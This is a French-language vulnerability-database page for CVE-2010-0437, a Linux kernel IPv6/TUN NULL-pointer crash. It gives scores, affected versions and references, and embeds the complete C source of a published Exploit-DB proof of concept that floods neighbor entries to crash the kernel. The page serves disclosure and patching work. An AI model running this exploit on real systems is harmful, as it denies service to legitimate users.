CVE-2010-0437 : Détail

CVE-2010-0437

3.39%V4
Network
2010-03-24
09h00 +00:00
2018-10-10
16h57 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The ip6_dst_lookup_tail function in net/ipv6/ip6_output.c in the Linux kernel before 2.6.27 does not properly handle certain circumstances involving an IPv6 TUN network interface and a large number of neighbors, which allows attackers to cause a denial of service (NULL pointer dereference and OOPS) or possibly have unspecified other impact via unknown vectors.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.8 AV:N/AC:L/Au:N/C:N/I:N/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 33635

Date de publication : 2008-07-30 22h00 +00:00
Auteur : Rémi Denis-Courmont
EDB Vérifié : Yes

/* source: https://www.securityfocus.com/bid/38185/info The Linux kernel is prone to a local denial-of-service vulnerability. Attackers can exploit this issue to crash the affected kernel, denying service to legitimate users. Given the nature of this issue, attackers may also be able to execute arbitrary code, but this has not been confirmed. */ /* gcc -std=gnu99 -O2 -g -lpthread -lrt tunload.c -o tunload */ /***************************************************************************** * Copyright (C) 2008 Remi Denis-Courmont. All rights reserved. * * * * Redistribution and use in source and binary forms, with or without * * modification, are permitted provided that the above copyright notice is * * retained and/or reproduced in the documentation provided with the * * distribution. * * * * To the extent permitted by law, this software is provided with no * * express or implied warranties of any kind. * * The situation as regards scientific and technical know-how at the time * * when this software was distributed did not enable all possible uses to be * * tested and verified, nor for the presence of any or all faults to be * * detected. In this respect, people's attention is drawn to the risks * * associated with loading, using, modifying and/or developing and * * reproducing this software. * * The user shall be responsible for verifying, by any or all means, the * * software's suitability for its requirements, its due and proper * * functioning, and for ensuring that it shall not cause damage to either * * persons or property. * * * * The author does not warrant that this software does not infringe any or * * all intellectual right relating to a patent, a design or a trademark. * * Moreover, the author shall not hold someone harmless against any or all * * proceedings for infringement that may be instituted in respect of the * * use, modification and redistrbution of this software. * *****************************************************************************/ #define _GNU_SOURCE 1 #include <stdio.h> #include <string.h> #include <stdarg.h> #include <stdlib.h> #include <stdint.h> #include <sys/types.h> #include <sys/stat.h> #include <sys/ioctl.h> #include <fcntl.h> #include <unistd.h> #include <netinet/in.h> #include <linux/if.h> #include <linux/if_tun.h> #include <pthread.h> static void run (const char *fmt, ...) { va_list ap; char *cmd; va_start (ap, fmt); vasprintf (&cmd, fmt, ap); va_end (ap); system (cmd); free (cmd); } static int tun_open (void) { struct ifreq req; int fd = open ("/dev/net/tun", O_RDWR); if (fd == -1) return -1; memset (&req, 0, sizeof (req)); req.ifr_flags = IFF_TUN; if (ioctl (fd, TUNSETIFF, &req)) { (void) close (fd); return -1; } run ("ip link set dev %s up", req.ifr_name); run ("ip -6 address add fd34:5678:9abc:def0::1/64 dev %s", req.ifr_name); return fd; } static unsigned rcvd; static int tun; static void cleanup_fd (void *data) { (void) close ((intptr_t)data); } static void *thread (void *data) { unsigned n = (uintptr_t)data; struct sockaddr_in6 dst; uint16_t tunhead[2]; int fd = socket (PF_INET6, SOCK_DGRAM, 0); pthread_cleanup_push (cleanup_fd, (void *)(intptr_t)fd); memset (&dst, 0, sizeof (dst)); dst.sin6_family = AF_INET6; dst.sin6_addr.s6_addr32[0] = htonl (0xfd345678); dst.sin6_addr.s6_addr32[1] = htonl (0x9ABCDEF0); dst.sin6_addr.s6_addr32[2] = htonl (0); dst.sin6_port = htons (53); __sync_fetch_and_and (&rcvd, 0); for (;;) { dst.sin6_addr.s6_addr32[3] = __sync_fetch_and_add (&rcvd, 1) % n; sendto (fd, NULL, 0, 0, (struct sockaddr *)&dst, sizeof (dst)); read (tun, tunhead, 4); } pthread_cleanup_pop (0); } int main (void) { setvbuf (stdout, NULL, _IONBF, 0); tun = tun_open (); if (tun == -1) { perror ("Error"); return 1; } for (uintptr_t n = 1; n <= (1 << 20); n *= 2) { struct timespec ts = { 1, 0, }; pthread_t th; printf ("%6ju: ", (uintmax_t)n); pthread_create (&th, NULL, thread, (void *)n); clock_nanosleep (CLOCK_MONOTONIC, 0, &ts, NULL); pthread_cancel (th); pthread_join (th, NULL); __sync_synchronize (); printf ("%12u\n", rcvd); } close (tun); return 0; }

Products Mentioned

Configuraton 0

Linux>>Linux_kernel >> Version To (including) 2.6.26.8

Linux>>Linux_kernel >> Version 2.6.0

Linux>>Linux_kernel >> Version 2.6.1

Linux>>Linux_kernel >> Version 2.6.2

Linux>>Linux_kernel >> Version 2.6.3

Linux>>Linux_kernel >> Version 2.6.4

Linux>>Linux_kernel >> Version 2.6.5

Linux>>Linux_kernel >> Version 2.6.6

Linux>>Linux_kernel >> Version 2.6.7

Linux>>Linux_kernel >> Version 2.6.8

Linux>>Linux_kernel >> Version 2.6.8.1

Linux>>Linux_kernel >> Version 2.6.9

Linux>>Linux_kernel >> Version 2.6.9

Linux>>Linux_kernel >> Version 2.6.9

Linux>>Linux_kernel >> Version 2.6.9

Linux>>Linux_kernel >> Version 2.6.9

Linux>>Linux_kernel >> Version 2.6.10

Linux>>Linux_kernel >> Version 2.6.11

Linux>>Linux_kernel >> Version 2.6.11.1

Linux>>Linux_kernel >> Version 2.6.11.2

Linux>>Linux_kernel >> Version 2.6.11.3

Linux>>Linux_kernel >> Version 2.6.11.4

Linux>>Linux_kernel >> Version 2.6.11.5

Linux>>Linux_kernel >> Version 2.6.11.6

Linux>>Linux_kernel >> Version 2.6.11.7

Linux>>Linux_kernel >> Version 2.6.11.8

Linux>>Linux_kernel >> Version 2.6.11.9

Linux>>Linux_kernel >> Version 2.6.11.10

Linux>>Linux_kernel >> Version 2.6.11.11

Linux>>Linux_kernel >> Version 2.6.11.12

Linux>>Linux_kernel >> Version 2.6.12

Linux>>Linux_kernel >> Version 2.6.12.1

Linux>>Linux_kernel >> Version 2.6.12.2

Linux>>Linux_kernel >> Version 2.6.12.3

Linux>>Linux_kernel >> Version 2.6.12.4

Linux>>Linux_kernel >> Version 2.6.12.5

Linux>>Linux_kernel >> Version 2.6.12.6

Linux>>Linux_kernel >> Version 2.6.13

Linux>>Linux_kernel >> Version 2.6.13.1

Linux>>Linux_kernel >> Version 2.6.13.2

Linux>>Linux_kernel >> Version 2.6.13.3

Linux>>Linux_kernel >> Version 2.6.13.4

Linux>>Linux_kernel >> Version 2.6.13.5

Linux>>Linux_kernel >> Version 2.6.14

Linux>>Linux_kernel >> Version 2.6.14.1

Linux>>Linux_kernel >> Version 2.6.14.2

Linux>>Linux_kernel >> Version 2.6.14.3

Linux>>Linux_kernel >> Version 2.6.14.4

Linux>>Linux_kernel >> Version 2.6.14.5

Linux>>Linux_kernel >> Version 2.6.14.6

Linux>>Linux_kernel >> Version 2.6.14.7

Linux>>Linux_kernel >> Version 2.6.15

Linux>>Linux_kernel >> Version 2.6.15.1

Linux>>Linux_kernel >> Version 2.6.15.2

Linux>>Linux_kernel >> Version 2.6.15.3

Linux>>Linux_kernel >> Version 2.6.15.4

Linux>>Linux_kernel >> Version 2.6.15.5

Linux>>Linux_kernel >> Version 2.6.15.6

Linux>>Linux_kernel >> Version 2.6.15.7

Linux>>Linux_kernel >> Version 2.6.16

Linux>>Linux_kernel >> Version 2.6.16.1

Linux>>Linux_kernel >> Version 2.6.16.2

Linux>>Linux_kernel >> Version 2.6.16.3

Linux>>Linux_kernel >> Version 2.6.16.4

Linux>>Linux_kernel >> Version 2.6.16.5

Linux>>Linux_kernel >> Version 2.6.16.6

Linux>>Linux_kernel >> Version 2.6.16.7

Linux>>Linux_kernel >> Version 2.6.16.8

Linux>>Linux_kernel >> Version 2.6.16.9

Linux>>Linux_kernel >> Version 2.6.16.10

Linux>>Linux_kernel >> Version 2.6.16.11

Linux>>Linux_kernel >> Version 2.6.16.12

Linux>>Linux_kernel >> Version 2.6.16.13

Linux>>Linux_kernel >> Version 2.6.16.14

Linux>>Linux_kernel >> Version 2.6.16.15

Linux>>Linux_kernel >> Version 2.6.16.16

Linux>>Linux_kernel >> Version 2.6.16.17

Linux>>Linux_kernel >> Version 2.6.16.18

Linux>>Linux_kernel >> Version 2.6.16.19

Linux>>Linux_kernel >> Version 2.6.16.20

Linux>>Linux_kernel >> Version 2.6.16.21

Linux>>Linux_kernel >> Version 2.6.16.22

Linux>>Linux_kernel >> Version 2.6.16.23

Linux>>Linux_kernel >> Version 2.6.16.24

Linux>>Linux_kernel >> Version 2.6.16.25

Linux>>Linux_kernel >> Version 2.6.16.26

Linux>>Linux_kernel >> Version 2.6.16.27

Linux>>Linux_kernel >> Version 2.6.16.28

Linux>>Linux_kernel >> Version 2.6.16.29

Linux>>Linux_kernel >> Version 2.6.16.30

Linux>>Linux_kernel >> Version 2.6.16.31

Linux>>Linux_kernel >> Version 2.6.16.31

    Linux>>Linux_kernel >> Version 2.6.16.31

      Linux>>Linux_kernel >> Version 2.6.16.31

        Linux>>Linux_kernel >> Version 2.6.16.31

          Linux>>Linux_kernel >> Version 2.6.16.31

            Linux>>Linux_kernel >> Version 2.6.16.32

            Linux>>Linux_kernel >> Version 2.6.16.33

            Linux>>Linux_kernel >> Version 2.6.16.34

            Linux>>Linux_kernel >> Version 2.6.16.35

            Linux>>Linux_kernel >> Version 2.6.16.36

            Linux>>Linux_kernel >> Version 2.6.16.37

            Linux>>Linux_kernel >> Version 2.6.16.38

            Linux>>Linux_kernel >> Version 2.6.16.39

            Linux>>Linux_kernel >> Version 2.6.16.40

            Linux>>Linux_kernel >> Version 2.6.16.41

            Linux>>Linux_kernel >> Version 2.6.16.42

            Linux>>Linux_kernel >> Version 2.6.16.43

            Linux>>Linux_kernel >> Version 2.6.16.44

            Linux>>Linux_kernel >> Version 2.6.16.45

            Linux>>Linux_kernel >> Version 2.6.16.46

            Linux>>Linux_kernel >> Version 2.6.16.47

            Linux>>Linux_kernel >> Version 2.6.16.48

            Linux>>Linux_kernel >> Version 2.6.16.49

            Linux>>Linux_kernel >> Version 2.6.16.50

            Linux>>Linux_kernel >> Version 2.6.16.51

            Linux>>Linux_kernel >> Version 2.6.16.52

            Linux>>Linux_kernel >> Version 2.6.16.53

            Linux>>Linux_kernel >> Version 2.6.16.54

            Linux>>Linux_kernel >> Version 2.6.16.55

            Linux>>Linux_kernel >> Version 2.6.16.56

            Linux>>Linux_kernel >> Version 2.6.16.57

            Linux>>Linux_kernel >> Version 2.6.16.58

            Linux>>Linux_kernel >> Version 2.6.16.59

            Linux>>Linux_kernel >> Version 2.6.16.60

            Linux>>Linux_kernel >> Version 2.6.16.61

            Linux>>Linux_kernel >> Version 2.6.16.62

            Linux>>Linux_kernel >> Version 2.6.17

            Linux>>Linux_kernel >> Version 2.6.17

            Linux>>Linux_kernel >> Version 2.6.17

            Linux>>Linux_kernel >> Version 2.6.17

            Linux>>Linux_kernel >> Version 2.6.17

            Linux>>Linux_kernel >> Version 2.6.17

            Linux>>Linux_kernel >> Version 2.6.17

            Linux>>Linux_kernel >> Version 2.6.17.1

            Linux>>Linux_kernel >> Version 2.6.17.2

            Linux>>Linux_kernel >> Version 2.6.17.3

            Linux>>Linux_kernel >> Version 2.6.17.4

            Linux>>Linux_kernel >> Version 2.6.17.5

            Linux>>Linux_kernel >> Version 2.6.17.6

            Linux>>Linux_kernel >> Version 2.6.17.7

            Linux>>Linux_kernel >> Version 2.6.17.8

            Linux>>Linux_kernel >> Version 2.6.17.9

            Linux>>Linux_kernel >> Version 2.6.17.10

            Linux>>Linux_kernel >> Version 2.6.17.11

            Linux>>Linux_kernel >> Version 2.6.17.12

            Linux>>Linux_kernel >> Version 2.6.17.13

            Linux>>Linux_kernel >> Version 2.6.17.14

            Linux>>Linux_kernel >> Version 2.6.18

            Linux>>Linux_kernel >> Version 2.6.18

            Linux>>Linux_kernel >> Version 2.6.18

            Linux>>Linux_kernel >> Version 2.6.18

            Linux>>Linux_kernel >> Version 2.6.18

            Linux>>Linux_kernel >> Version 2.6.18

            Linux>>Linux_kernel >> Version 2.6.18

            Linux>>Linux_kernel >> Version 2.6.18

            Linux>>Linux_kernel >> Version 2.6.18.1

            Linux>>Linux_kernel >> Version 2.6.18.2

            Linux>>Linux_kernel >> Version 2.6.18.3

            Linux>>Linux_kernel >> Version 2.6.18.4

            Linux>>Linux_kernel >> Version 2.6.18.5

            Linux>>Linux_kernel >> Version 2.6.18.6

            Linux>>Linux_kernel >> Version 2.6.18.7

            Linux>>Linux_kernel >> Version 2.6.18.8

            Linux>>Linux_kernel >> Version 2.6.19

            Linux>>Linux_kernel >> Version 2.6.19.1

            Linux>>Linux_kernel >> Version 2.6.19.2

            Linux>>Linux_kernel >> Version 2.6.19.3

            Linux>>Linux_kernel >> Version 2.6.19.4

            Linux>>Linux_kernel >> Version 2.6.19.5

            Linux>>Linux_kernel >> Version 2.6.19.6

            Linux>>Linux_kernel >> Version 2.6.19.7

            Linux>>Linux_kernel >> Version 2.6.20

            Linux>>Linux_kernel >> Version 2.6.20.1

            Linux>>Linux_kernel >> Version 2.6.20.2

            Linux>>Linux_kernel >> Version 2.6.20.3

            Linux>>Linux_kernel >> Version 2.6.20.4

            Linux>>Linux_kernel >> Version 2.6.20.5

            Linux>>Linux_kernel >> Version 2.6.20.6

            Linux>>Linux_kernel >> Version 2.6.20.7

            Linux>>Linux_kernel >> Version 2.6.20.8

            Linux>>Linux_kernel >> Version 2.6.20.9

            Linux>>Linux_kernel >> Version 2.6.20.10

            Linux>>Linux_kernel >> Version 2.6.20.11

            Linux>>Linux_kernel >> Version 2.6.20.12

            Linux>>Linux_kernel >> Version 2.6.20.13

            Linux>>Linux_kernel >> Version 2.6.20.14

            Linux>>Linux_kernel >> Version 2.6.20.15

            Linux>>Linux_kernel >> Version 2.6.20.16

            Linux>>Linux_kernel >> Version 2.6.20.17

            Linux>>Linux_kernel >> Version 2.6.20.18

            Linux>>Linux_kernel >> Version 2.6.20.19

            Linux>>Linux_kernel >> Version 2.6.20.20

            Linux>>Linux_kernel >> Version 2.6.20.21

            Linux>>Linux_kernel >> Version 2.6.21

            Linux>>Linux_kernel >> Version 2.6.21.1

            Linux>>Linux_kernel >> Version 2.6.21.2

            Linux>>Linux_kernel >> Version 2.6.21.3

            Linux>>Linux_kernel >> Version 2.6.21.4

            Linux>>Linux_kernel >> Version 2.6.21.5

            Linux>>Linux_kernel >> Version 2.6.21.6

            Linux>>Linux_kernel >> Version 2.6.21.7

            Linux>>Linux_kernel >> Version 2.6.22

            Linux>>Linux_kernel >> Version 2.6.22.1

            Linux>>Linux_kernel >> Version 2.6.22.2

            Linux>>Linux_kernel >> Version 2.6.22.3

            Linux>>Linux_kernel >> Version 2.6.22.4

            Linux>>Linux_kernel >> Version 2.6.22.5

            Linux>>Linux_kernel >> Version 2.6.22.6

            Linux>>Linux_kernel >> Version 2.6.22.7

            Linux>>Linux_kernel >> Version 2.6.22.8

            Linux>>Linux_kernel >> Version 2.6.22.9

            Linux>>Linux_kernel >> Version 2.6.22.10

            Linux>>Linux_kernel >> Version 2.6.22.11

            Linux>>Linux_kernel >> Version 2.6.22.12

            Linux>>Linux_kernel >> Version 2.6.22.13

            Linux>>Linux_kernel >> Version 2.6.22.14

            Linux>>Linux_kernel >> Version 2.6.22.15

            Linux>>Linux_kernel >> Version 2.6.22.16

            Linux>>Linux_kernel >> Version 2.6.22.17

            Linux>>Linux_kernel >> Version 2.6.22.18

            Linux>>Linux_kernel >> Version 2.6.22.19

            Linux>>Linux_kernel >> Version 2.6.22.20

            Linux>>Linux_kernel >> Version 2.6.22.21

            Linux>>Linux_kernel >> Version 2.6.22.22

            Linux>>Linux_kernel >> Version 2.6.23

            Linux>>Linux_kernel >> Version 2.6.23

            Linux>>Linux_kernel >> Version 2.6.23

            Linux>>Linux_kernel >> Version 2.6.23.1

            Linux>>Linux_kernel >> Version 2.6.23.2

            Linux>>Linux_kernel >> Version 2.6.23.3

            Linux>>Linux_kernel >> Version 2.6.23.4

            Linux>>Linux_kernel >> Version 2.6.23.5

            Linux>>Linux_kernel >> Version 2.6.23.6

            Linux>>Linux_kernel >> Version 2.6.23.7

            Linux>>Linux_kernel >> Version 2.6.23.8

            Linux>>Linux_kernel >> Version 2.6.23.9

            Linux>>Linux_kernel >> Version 2.6.23.10

            Linux>>Linux_kernel >> Version 2.6.23.11

            Linux>>Linux_kernel >> Version 2.6.23.12

            Linux>>Linux_kernel >> Version 2.6.23.13

            Linux>>Linux_kernel >> Version 2.6.23.14

            Linux>>Linux_kernel >> Version 2.6.23.15

            Linux>>Linux_kernel >> Version 2.6.23.16

            Linux>>Linux_kernel >> Version 2.6.23.17

            Linux>>Linux_kernel >> Version 2.6.24

            Linux>>Linux_kernel >> Version 2.6.24

            Linux>>Linux_kernel >> Version 2.6.24

            Linux>>Linux_kernel >> Version 2.6.24

            Linux>>Linux_kernel >> Version 2.6.24

            Linux>>Linux_kernel >> Version 2.6.24

            Linux>>Linux_kernel >> Version 2.6.24.1

            Linux>>Linux_kernel >> Version 2.6.24.2

            Linux>>Linux_kernel >> Version 2.6.24.3

            Linux>>Linux_kernel >> Version 2.6.24.4

            Linux>>Linux_kernel >> Version 2.6.24.5

            Linux>>Linux_kernel >> Version 2.6.24.6

            Linux>>Linux_kernel >> Version 2.6.24.7

            Linux>>Linux_kernel >> Version 2.6.25

            Linux>>Linux_kernel >> Version 2.6.25.1

            Linux>>Linux_kernel >> Version 2.6.25.2

            Linux>>Linux_kernel >> Version 2.6.25.3

            Linux>>Linux_kernel >> Version 2.6.25.4

            Linux>>Linux_kernel >> Version 2.6.25.5

            Linux>>Linux_kernel >> Version 2.6.25.6

            Linux>>Linux_kernel >> Version 2.6.25.7

            Linux>>Linux_kernel >> Version 2.6.25.8

            Linux>>Linux_kernel >> Version 2.6.25.9

            Linux>>Linux_kernel >> Version 2.6.25.10

            Linux>>Linux_kernel >> Version 2.6.25.11

            Linux>>Linux_kernel >> Version 2.6.25.12

            Linux>>Linux_kernel >> Version 2.6.25.13

            Linux>>Linux_kernel >> Version 2.6.25.14

            Linux>>Linux_kernel >> Version 2.6.25.15

            Linux>>Linux_kernel >> Version 2.6.25.16

            Linux>>Linux_kernel >> Version 2.6.25.17

            Linux>>Linux_kernel >> Version 2.6.25.18

            Linux>>Linux_kernel >> Version 2.6.25.19

            Linux>>Linux_kernel >> Version 2.6.25.20

            Linux>>Linux_kernel >> Version 2.6.26

            Linux>>Linux_kernel >> Version 2.6.26.1

            Linux>>Linux_kernel >> Version 2.6.26.2

            Linux>>Linux_kernel >> Version 2.6.26.3

            Linux>>Linux_kernel >> Version 2.6.26.4

            Linux>>Linux_kernel >> Version 2.6.26.5

            Linux>>Linux_kernel >> Version 2.6.26.6

            Linux>>Linux_kernel >> Version 2.6.26.7

            Références

            http://www.redhat.com/support/errata/RHSA-2010-0147.html
            Tags : vendor-advisory, x_refsource_REDHAT
            http://www.openwall.com/lists/oss-security/2010/02/11/1
            Tags : mailing-list, x_refsource_MLIST
            http://secunia.com/advisories/43315
            Tags : third-party-advisory, x_refsource_SECUNIA
            http://secunia.com/advisories/39033
            Tags : third-party-advisory, x_refsource_SECUNIA
            http://www.openwall.com/lists/oss-security/2010/03/04/4
            Tags : mailing-list, x_refsource_MLIST
            http://www.redhat.com/support/errata/RHSA-2010-0161.html
            Tags : vendor-advisory, x_refsource_REDHAT